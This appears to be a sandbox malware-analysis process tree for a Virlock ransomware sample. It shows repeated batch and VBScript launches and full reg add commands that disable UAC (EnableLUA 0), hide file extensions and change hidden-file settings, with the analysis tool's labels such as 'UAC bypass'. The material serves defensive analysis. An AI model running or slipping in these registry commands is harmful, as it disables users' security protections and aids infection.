C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyEMQsME.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""72⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs73⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 170⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 270⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f70⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV171⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZmwYwosQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""70⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs71⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 168⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 268⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f68⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FucoggMI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""68⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs69⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 166⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 266⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f66⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XAwsAEoI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""66⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs67⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 164⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 264⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f64⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vGsMcAAQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""64⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs65⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 162⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 262⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f62⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV163⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RCkocMYM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""62⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV163⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs63⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 160⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 260⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f60⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YCIcEwow.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""60⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV161⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs61⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 158⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV159⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 258⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f58⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EeYUYUUU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""58⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs59⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 156⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 256⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f56⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV157⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ECgIgQMI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""56⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs57⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 154⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV155⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 254⤵
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV155⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f54⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV155⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csUEAAkc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""54⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs55⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 152⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV153⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 252⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f52⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xekoowcQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""52⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs53⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 150⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV151⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 250⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f50⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RMckwEkk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""50⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs51⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 148⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 248⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f48⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RoIcQQcE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""48⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs49⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 146⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 246⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f46⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NSMckAgU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""46⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs47⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 144⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 244⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV145⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f44⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GUEoIMIk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""44⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs45⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 142⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 242⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV143⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f42⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV143⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MEkoIYcw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""42⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs43⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 140⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 240⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f40⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eaMssMkA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""40⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV141⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs41⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 138⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 238⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f38⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VsAQoows.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""38⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs39⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 136⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 236⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f36⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nuwgoEQY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""36⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs37⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 134⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 234⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f34⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tIUkQgAA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""34⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs35⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 132⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 232⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f32⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HQwcUYUQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""32⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs33⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 130⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 230⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f30⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xaMgsIQU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""30⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs31⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 128⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 228⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f28⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\saUYgwwI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""28⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs29⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 126⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 226⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f26⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gIgYcIgY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""26⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs27⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 124⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 224⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f24⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MEAoIcQc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""24⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs25⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 122⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 222⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f22⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VqIEoUAM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""22⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs23⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 120⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 220⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f20⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lQssUgwA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""20⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs21⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 118⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 218⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f18⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FMsEssUM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""18⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs19⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 116⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 216⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f16⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwcgEwoc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""16⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs17⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 114⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 214⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f14⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\awEwAoIU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""14⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs15⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 112⤵
- Modifies visibility of file extensions in Explorer
-
